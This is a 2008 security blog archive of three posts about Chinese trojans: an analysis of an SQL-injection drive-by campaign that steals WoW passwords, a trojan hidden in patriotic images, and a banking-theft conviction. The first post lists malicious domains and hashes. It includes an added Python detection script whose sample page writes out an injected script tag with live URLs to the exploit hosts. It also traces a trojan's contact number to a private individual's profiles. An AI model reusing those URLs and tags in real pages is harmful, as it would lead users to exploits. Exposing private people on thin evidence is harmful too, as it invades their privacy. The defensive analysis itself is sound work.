Tag Archive 'trojan'

Nov 10 2008

Chinese hackers will do anything for your WoW password (updated)

Trojan Horse

So the Analyst's Diary blog at viruslist.com has an article on a new mass SQL injection attack that injects redirects to browser exploits into .asp pages. The exploits drop one of two trojans that steal passwords and other data. Here is h.js:

document.write("");
document.write("");

WordPress won't display the script. Basically, it writes an iframe pointing to each of two URLs (these URLs host browser exploits, so don't follow them):

hxxp://vvexe.com/haha/index.html and
hxxp://www.kenya.com/faq.htm

I can’t seem to get to either of these sites at the moment. I’ll try again later.

Update: I spent some time looking at this malware. The two pages listed earlier in this post contain iframes to browser plug-in exploits for RealPlayer and other typical vulnerabilities. The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746, not packed/Delphi code), which in turn downloads hxxp://www.vvexe.com/haha/down.txt to get the additional files 1.exe (a7fc8c966fdeb550fe19aba3169569be, not packed/VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850) and cool.exe (18867d6de1a3a9241c14c22c19b51351, not packed/Delphi).

1.exe is a WoW trojan that waits for passwords sent to grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com. It also looks for and attempts to disable many types of security software. It attempts to send the stolen credentials to an ASP page on www.yilu777.com.
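A quick way to hunt for this chain on your own servers and samples, as an added example that is not from the Analyst's Diary post or from this blog: scan rendered HTML/ASP output for script or iframe tags pointing at the hosts named above (and, as a broader heuristic, for hidden iframes to any external host, since that is how h.js-style loaders usually embed the exploit page), and compare file hashes against the MD5s listed. The domains and hashes are the ones quoted in this post (written with http:// rather than the defanged hxxp://); the sample page, the example.org placeholder host and the stand-in binary are constructed for the example.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the post above: hosts used by the injected script/iframes
# and the dropped files' MD5s. Everything else in this block is an added example.
IOC_DOMAINS = {"vvexe.com", "kenya.com", "yilu777.com"}
IOC_MD5 = {
    "e160f590d894a98474697ac0db987746": "down.exe",
    "a7fc8c966fdeb550fe19aba3169569be": "1.exe",
    "5af5edaa2cebf1fed56ad36799b2c850": "do.exe",
    "18867d6de1a3a9241c14c22c19b51351": "cool.exe",
}


class _TagCollector(HTMLParser):
    """Record every <script> and <iframe> start tag with its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            self.tags.append((tag, attrs))


def _is_bad_host(host, bad_domains):
    """True if host is a listed domain or any subdomain of one."""
    parts = host.lower().split(".")
    return any(".".join(parts[i:]) in bad_domains for i in range(len(parts)))


def _is_hidden(attrs):
    """Zero-sized or display:none iframes are the classic drive-by pattern."""
    a = {k.lower(): (v or "") for k, v in attrs}
    if a.get("width", "").strip() == "0" or a.get("height", "").strip() == "0":
        return True
    style = a.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def find_injected_refs(html, bad_domains=IOC_DOMAINS):
    """Return (tag, src, reason) for script/iframe tags whose src points at a
    listed host, or for hidden iframes pointing at any external host (heuristic)."""
    parser = _TagCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for tag, attrs in parser.tags:
        src = next((v or "" for k, v in attrs if k.lower() == "src"), "")
        host = urlparse(src).hostname
        if not host:
            continue  # relative src: served locally, not an injected remote include
        if _is_bad_host(host, bad_domains):
            hits.append((tag, src, "known-domain"))
        elif tag == "iframe" and _is_hidden(attrs):
            hits.append((tag, src, "hidden-iframe"))
    return hits


def md5_hits(samples, known=IOC_MD5):
    """samples: {name: bytes}. Return (name, md5, label) for every known hash."""
    hits = []
    for name, data in samples.items():
        digest = hashlib.md5(data).hexdigest()
        if digest in known:
            hits.append((name, digest, known[digest]))
    return hits


# Constructed page: a product listing whose database text was "decorated" with
# the injected script tag (unquoted src, the way mass SQL injections usually emit
# it), plus the kind of iframes h.js writes. example.org is a placeholder host.
SAMPLE_HTML = """<html><body><h1>Products</h1>
<p>Widget 2000<script src=http://www.vvexe.com/haha/h.js></script></p>
<script src="/js/site.js"></script>
<iframe src="http://vvexe.com/haha/index.html" width="0" height="0"></iframe>
<iframe src="http://www.example.org/ad.html" style="display: none"></iframe>
</body></html>"""


def demo():
    refs = find_injected_refs(SAMPLE_HTML)
    # Constructed stand-in for a dropped binary; its digest is added to the
    # lookup table so the hash check has something to match offline.
    fake_dropper = b"MZ\x90\x00 constructed sample, not real malware"
    known = dict(IOC_MD5)
    known[hashlib.md5(fake_dropper).hexdigest()] = "constructed-sample"
    hashes = md5_hits({"tmp/down.exe": fake_dropper, "tmp/readme.txt": b"hello"}, known)
    return refs, hashes


if __name__ == "__main__":
    refs, hashes = demo()
    for hit in refs + hashes:
        print(hit)
```

The domain check matches subdomains too, so www.vvexe.com and vvexe.com both hit the single vvexe.com entry; the hidden-iframe branch is a heuristic and will flag legitimate tracking frames, so treat it as a lead, not a verdict.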

do.exe is a little more interesting. It appears to be a generic remote access trojan that sends a beacon to QQ number 58836533. A quick search for that QQ number revealed that this person's Paipai account has been frozen:

http://shop.paipai.com/58836533

So I did some more digging and found the QQ profile, with a name and nick:

Searching for the nickname got me to a few blogs and profiles belonging to a young girl who is really into anime. Maybe her QQ account got pwn3d, or maybe, just maybe, she is a member of "China Girl Security". I tried to get an add on that QQ account so I could talk to the hacker, but didn't have any luck.

Note to Chinese hackers: Please pay the tax on your WoW gold profits.


May 20 2008

Chinese hackers…masters of social engineering

If I were in the business of spotting popular trends, the first thing I would do is hire a Chinese hacker. While the rest of the world passively watches events unfold around them, Chinese hackers are doing the math on how many people will participate and which online avenues are associated with those events... like symbols.

According to an article on tech.ccidnet.com, hackers are using recent events, and the patriotism they have inspired, to spread a new trojan called "Red Heart Robber." The snatching of the Olympic torch, the CNN incident, and the earthquake in Sichuan have led the Chinese online community to attach red hearts with the Chinese flag (and other variations) to their QQ signatures and web pages to show support and sympathy for China. When ordinary users download the image of the red heart flag to show their support, a nasty little trojan comes attached.

Attacking your own symbol of patriotism…not cool!


Mar 25 2008

Once again, NEVER hack inside the PRC


I found this article this morning in the English-language Shanghai Daily. The article reports that three hackers and an idiot were jailed for using trojan horse programs to steal online banking credentials and then transferring the money to the idiot's own account.

Yu then used a laptop they bought together to log onto the accounts, targeting accounts with a great deal of money.

He transferred the money to his own online account. Yu, Chen and Zhao then drew money out of Yu's accounts using ATMs in different areas.

They allegedly stole 127,800 yuan from three victims. See also Heike's posts about Hacking for Money and Never Hack Inside China, Ever. These guys are probably not the immoral, robot-like assassins the PRC government is concerned about.

Update: I'm having trouble loading the page. You can find a mirror of the article in the InfoSec News list archive on Neohapsis here.
